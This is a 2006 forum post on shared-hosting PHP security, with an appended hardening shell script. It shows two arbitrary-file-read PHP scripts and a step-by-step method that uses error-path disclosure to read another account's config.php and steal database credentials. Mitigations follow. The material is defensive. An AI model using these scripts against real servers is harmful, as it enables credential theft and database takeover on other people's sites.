Security on shared web servers! Be careful: everybody can hack
Posted: Sun Jul 16, 2006 5:57 am
Hi
If your PHP portal is installed on a shared server, you must be careful.
Another user resident on your server (he has a hosting account on your server) can hack your portal!
How can he hack your portal?
With this script (script 1):
Code:
<?php
// As posted, script 1 relied on register_globals turning ?a=... into $a;
// reading it from $_GET keeps the same behaviour on PHP without register_globals.
$a = isset($_GET['a']) ? $_GET['a'] : null;
if (isset($a)) {
    // Read the whole file at the given path and print it unchanged.
    echo implode("", file($a));
}
?>
And with another one (script 2):
Code:
<?php
// Serve the requested file as plain text so the browser shows the raw
// PHP source instead of rendering it as HTML.
header('Content-Type: text/plain');
readfile($_GET['a']);
?>
With these scripts, a user resident on your server can get your files or your code; for example, he can get your config.php, see your database user, password and name, and take down your data!!!
1- The hacker must know your ID on your hosting, so he calls one of the PHP files belonging to your portal in his browser, for example:
Code:
http://www.yourwebsite.com/forum/includes/functions.php?anyfunctionIntegerArgument=text
After this request he sees an error report like this:
Code:
/home/yourID/public_html/forum/includes/functions.php error 607 in line 563
Now he has found your ID.
2- Now he uses one of these scripts, for example script 1, like in this case:
Code:
http://www.hackerWebsite.com/script1.php?a=/home/yourID/public_html/forum/config.php
Then he views the page source and reads your DB config information!
3- Using a simple script he can download your DB, or he can write to your DB and ...
He can install the same portal, edit and change some code, then use your encrypted admin password to log in sometimes and...
How can we solve this problem?
1- We must add this code to the prologue of all PHP files:
Code:
ini_set('display_errors', 'Off');
ini_set('log_errors', 'On');
So the hacker cannot find your ID, and you can see the error log in the cPanel of your Linux hosting.
2- You must rename your config.php file and edit all PHP files which include or require config.php. Then you must encrypt these files using Zend PHP Encoder or any other encoder program.
So if a hacker finds your ID he will not find your DB config file.
3- Or use a dedicated server only for yourself.
In PHP-Nuke, if you use NukeSentinel and the IP tracker is on, then all users' usernames and passwords (even the admin's) are inserted into nuke_nsnst_tracked_ips!!!
So the Nuke owner or a hacker can see users' passwords.
If you want to register on portals, you must use a different password.
If your password is the same as for your other important things, for example your email password, your domain panel password or your bank account, a hacker or the Nuke website owner can access them!
In other portals, the owner can change the script code and find your password.
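The following shell script is an added example; it is not from the original post or from PHP-Nuke. It turns the post's problem into a check you can run inside your own hosting account: it lists the config files that a neighbour's "script 1" could read, and takes the read bit for other users away from them. It assumes PHP runs as your own Unix user (suPHP, suexec or a per-account PHP-FPM pool), because that is the only setup in which an owner-only file mode keeps another account out while your own scripts can still include the file; under plain mod_php every vhost runs as the same web-server user, and file modes alone cannot separate accounts there. The directory tree, file names and contents built in demo() are constructed for the demonstration.

```sh
#!/bin/sh
# Added example, not code from the original post.
# Assumption: PHP executes as the account's own Unix user, so chmod 600 on a
# config file still lets your scripts read it but blocks other accounts.

# List every config*.php (the post's example of a sensitive file) under $1
# that is readable by "other", i.e. by a neighbouring hosting account.
# Extend the -name patterns for whatever else your portal keeps secrets in.
find_exposed() {
    find "$1" -type f -name 'config*.php' -perm -o+r
}

# Number of exposed files, returned as text so a caller can check it
# instead of only reading the listing.
count_exposed() {
    find_exposed "$1" | wc -l | tr -d ' '
}

# Drop group and other read permission from each exposed file; the owner
# keeps read access, so the portal keeps working.
harden() {
    find_exposed "$1" | while IFS= read -r f; do
        chmod go-r "$f"
        echo "fixed: $f"
    done
}

# Demonstration on a constructed tree (sample data, not a real account):
# prints "<exposed before> <exposed after>".
demo() {
    root=$(mktemp -d)
    mkdir -p "$root/forum/includes"
    printf '<?php $dbpass = "secret";\n' > "$root/forum/config.php"
    printf '<?php function f() {}\n' > "$root/forum/includes/functions.php"
    chmod 644 "$root/forum/config.php"      # the usual default: world-readable
    before=$(count_exposed "$root")
    harden "$root" >/dev/null
    after=$(count_exposed "$root")
    rm -rf "$root"
    echo "$before $after"
}
```

Run demo for the constructed tree, or harden /home/yourID/public_html inside your own account (the path is the post's placeholder; substitute your real web root). The mode change complements rather than replaces the post's error-reporting advice: an ini_set() at the top of a file cannot hide a parse error in that same file, since parsing happens before any line runs, so also set display_errors=Off and log_errors=On in php.ini or, on CGI/FastCGI hosts, in a .user.ini in the web root.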